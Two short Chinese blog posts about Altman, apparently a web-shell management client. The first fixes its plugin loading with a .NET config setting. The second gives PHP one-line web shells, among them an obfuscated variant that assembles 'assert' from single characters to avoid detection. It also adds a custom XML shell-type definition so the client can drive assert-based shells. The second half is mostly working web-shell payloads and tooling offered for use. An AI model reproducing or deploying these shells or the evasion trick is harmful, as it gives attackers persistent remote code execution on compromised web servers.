一直有小伙伴给我反馈说:在.Net环境安装好的情况下,Altman不能自动载入插件。 而我在测试的时候,确实发生过相似的现象,但却找不到问题所在。 今天早些时候,在stackoverflow看到之前有人提到过类似的问题,恍然大悟。 原来,当我们从Web下载Altman程序的时候,程序集将会被添加一个新的安全属性(文件来自网络,已被锁定)。运行altman,由于loadFromRemoteSources默认属性是false,程序就无法加载这些插件dll。(在这里有详细的说明) 所以,解决这个问题目前有三种方法: 手动修改Plugins目录下插件的文件属性。 在程序根目录下添加Altman.exe.config,内容如下: <configuration> <runtime> <loadFromRemoteSources enabled="true"/> </runtime> </configuration> 主程序将在下一个版本2.2.1中解决该问题。
之前测试altman工具的时候,遇到了一个问题,现解决方法如下: Altman连接phpEval一句话木马的时候,phpEval.type的定义如下: <customShellType> <basicSetting> <name>phpEval</name> <serviceExample><![CDATA[<?php @eval($_POST[a])?>]]></serviceExample> <mainCodeParam location="Body" encrymode="None" >passwd</mainCodeParam> </basicSetting> <mainCodeSetting> <funcCodeParam location="Body" encrymode="Base64" >funcCode</funcCodeParam> <item><![CDATA[print("->|"); eval(base64_decode($_POST[$funcCode$])); print("|<-"); die();]]></item> </mainCodeSetting> </customShellType> eval函数执行php语句 print("->|");eval(base64_decode($_POST[$funcCode$]));print("|<-");die();时, 确实是正确的。 然而当使用某些变形php一句话木马,如: <?php $a = "a"."s"."s"."e"."r"."t"; $a($_POST["a"]); ?> 时, Altman就无法连接一句话木马了。 原因在于,这个变形木马使用的是assert函数,而eval与assert最主要区别是eval的参数可以是多个语句,而assert的参数是一个表达式。所以assert只会执行到print("->|")代码,后面的代码则直接报错了。 所以在了解到eval与assert的区别后,很容易写出一个新脚本类型,phpAssert.type定义如下: <customShellType> <basicSetting> <name>phpAssert</name> <serviceExample><![CDATA[<?php @assert($_POST[a])?>]]></serviceExample> <mainCodeParam location="Body" encrymode="None" >passwd</mainCodeParam> </basicSetting> <mainCodeSetting> <funcCodeParam location="Body" encrymode="Base64" >funcCode</funcCodeParam> <item><![CDATA[@eval("print('->|');".base64_decode($_POST[$funcCode$])."print('|<-');");]]></item> </mainCodeSetting> </customShellType> PS:其实assert还有一个坑,那就是echo在assert中是不能直接使用的,因为在php中echo并不是一个函数:),不能作为表达式。